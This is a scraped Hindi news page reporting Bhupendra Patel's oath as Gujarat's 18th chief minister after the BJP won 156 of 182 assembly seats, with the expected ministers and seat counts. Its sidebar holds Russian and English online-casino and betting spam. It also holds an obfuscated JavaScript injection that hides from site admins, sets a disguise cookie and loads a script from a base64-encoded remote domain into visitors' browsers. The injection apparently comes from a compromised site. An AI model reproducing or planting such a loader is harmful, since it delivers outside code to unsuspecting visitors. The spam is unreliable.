भूपेंद्र आज दोपहर 2 बजे गुजरात के 18वें मुख्यमंत्री पद की शपथ लेंगे

- Advertisement -
- Advertisement -

राष्ट्र आजकल प्रतिनिधि । 62 साल के भूपेंद्र पटेल सोमवार को दोपहर 2 बजे गुजरात के 18वें मुख्यमंत्री पद की शपथ लेंगे। वे पाटीदार समुदाय से इकलौते ऐसे नेता हैं, जो लगातार दूसरी बार CM बन रहे हैं। उन्हें 15 महीने पहले विजय रुपाणी की जगह राज्य की जिम्मेदारी दी गई थी। शपथ ग्रहण समारोह गांधीनगर सचिवालय के हेलीपैड ग्राउंड में होगा। भाजपा ने हाल के विधानसभा चुनाव में 182 सीटों में से 156 जीतीं।

शपथ ग्रहण में पीएम मोदी के अलावा भाजपा शासित राज्यों के ज्यादातर CM शामिल होंगे। इनके अलावा, गृह मंत्री अमित शाह, रक्षा मंत्री राजनाथ सिंह, बीजेपी अध्यक्ष जेपी नड्डा और केंद्रीय मंत्री भी मौजूद रहेंगे। इनमें से ज्यादातर नेता रात में ही अहमदाबाद पहुंच गए हैं। इसके अलावा दो हजार से अधिक कार्यकर्ता तथा साधु-संत और महंत समेत अन्य लोग शामिल रहेंगे।
16 विधायकों का मंत्री बनना तय माना जा रहा है। इनमें 12 विधायकों के फोन जा चुके हैं। इनमें हर्ष संघवी, मुकेश पटेल, पुरुषोत्तम सोलंकी, बलवंत सिंह राजपूत, मोलूभाई बेरा, भानुबेन बाबरिया, बचु खाबड़, कुबेर डिडोर, जगदीश विश्वकर्मा, भीखू परमार, देवा मालूम, प्रफुल्ल पानसेरिया, ऋषिकेश पटेल, कनुभाई देसाई, राघवजी पटेल, कुंवरजी बावलिया हैं। हार्दिक पटेल के नाम पर अभी संशय बना हुआ है।

गुजरात में भाजपा ने 182 विधानसभा सीटों में से 156 सीटों के साथ जीत का नया रिकॉर्ड बनाया है। कांग्रेस ने 1985 में माधव सिंह सोलंकी की अगुआई में 149 विधानसभा सीटें जीती थीं। वहीं, नरेंद्र मोदी के CM रहते भाजपा ने 2002 के चुनाव में 127 सीटें जीती थीं। इस जीत के साथ भाजपा ने दोनों रिकॉर्ड तोड़ दिए हैं।

भाजपा को इस बार 2017 के मुकाबले 58 सीटों का फायदा हुआ है। वहीं, कांग्रेस को सबसे ज्यादा 60 सीटों का नुकसान हुआ है। पार्टी ने पिछली बार 77 सीटें जीती थीं। इस बार उसे 17 सीटें ही मिली हैं। आम आदमी पार्टी ने 5 सीटें जीती हैं। निर्दलीय को तीन और सपा को एक सीट पर जीत मिली है।

- Advertisement -

Latest news

Обзор онлайн-казино: процесс регистрации и игровой функционал Леон казино

Обзор онлайн-казино: процесс регистрации и игровой функционал Леон казино Оформление профиля в интернет-казино — это начальный этап к захватывающему миру гэмблинга. Процесс регистрации как правило...
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

Experience Thrills with the Spinanga Casino Adventure

Experience Thrills with the Spinanga Casino Adventure Table of Contents ...

1win официальный сайт букмекерской конторы 1вин.4712

1win — официальный сайт букмекерской конторы 1вин ▶️ ИГРАТЬ ...

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();

1Win официальный сайт букмекера 1Вин ставки на спорт.2312 (2)

1Win официальный сайт букмекера — 1Вин ставки на спорт ...
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here